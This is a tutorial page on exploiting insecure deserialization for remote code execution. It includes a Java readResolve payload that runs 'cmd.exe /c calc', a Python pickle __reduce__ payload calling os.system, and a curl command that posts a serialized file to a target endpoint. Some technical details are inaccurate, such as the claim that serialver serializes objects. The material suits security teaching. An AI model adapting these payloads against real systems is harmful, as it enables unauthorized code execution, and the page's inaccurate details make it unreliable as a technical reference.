Skip to content

Exploitation with RCE

Deserialization vulnerabilities can be leveraged for Remote Code Execution (RCE) by exploiting the unsafe reconstruction of objects from untrusted data. This section demonstrates how to craft and deliver payloads that trigger arbitrary code execution during the deserialization process, focusing on common attack vectors and practical examples.


Understanding the Attack Vector

Deserialization RCE relies on the target application deserializing untrusted data (e.g., serialized objects, JSON, or binary blobs) without proper validation. Attackers craft payloads that, when deserialized, execute malicious code. Common protocols include:
- Java's ObjectInputStream: Uses serialized Java objects with malicious readObject() logic.
- Python's pickle: Exploits the __reduce__ method to trigger arbitrary functions.
- .NET's BinaryFormatter: Leverages type-unsafe deserialization via SurrogateSelector.

The core principle is to inject a serialized object that, when reconstructed, executes a payload (e.g., shell commands, reverse shells, or arbitrary code).


Crafting the Payload

Java Example: Exploiting ObjectInputStream

A malicious Java object can invoke Runtime.exec() to execute commands. Tools like ysoserial automate payload generation.

Example payload (Java):

import java.io.*;
import java.lang.*;
import java.util.*;

public class RCEPayload implements Serializable {
    private static final long serialVersionUID = 1L;

    public Object readResolve() {
        try {
            Runtime.getRuntime().exec("cmd.exe /c calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
        return null;
    }
}
Compile and serialize this class into a .ser file using serialver or a tool like ysoserial.

Python Example: Exploiting pickle

Python's pickle module allows code execution via the __reduce__ method.

Example payload (Python):

import pickle
import os

class RCEPayload:
    def __reduce__(self):
        return (os.system, ('calc',))

# Serialize the payload
payload = pickle.dumps(RCEPayload())
print(payload)
This generates a byte stream that, when deserialized, executes calc.exe.


Delivery Methods

Attackers deliver payloads via:
1. HTTP Request: Inject serialized data into request bodies (e.g., POST payloads).

curl -X POST http://target.com/vulnerable-endpoint \
  -d @malicious.ser
2. File Upload: Upload serialized files to endpoints accepting user-submitted data.
3. Interception Tools: Use Burp Suite or Wireshark to modify serialized data in transit.


Key takeaways

  • Deserialization RCE exploits unsafe object reconstruction to execute arbitrary code.
  • Payload crafting depends on the target language and protocol (e.g., Java's readResolve, Python's __reduce__).
  • Delivery often involves HTTP requests, file uploads, or network interception.
  • Always validate and sanitize untrusted serialized data to prevent exploitation.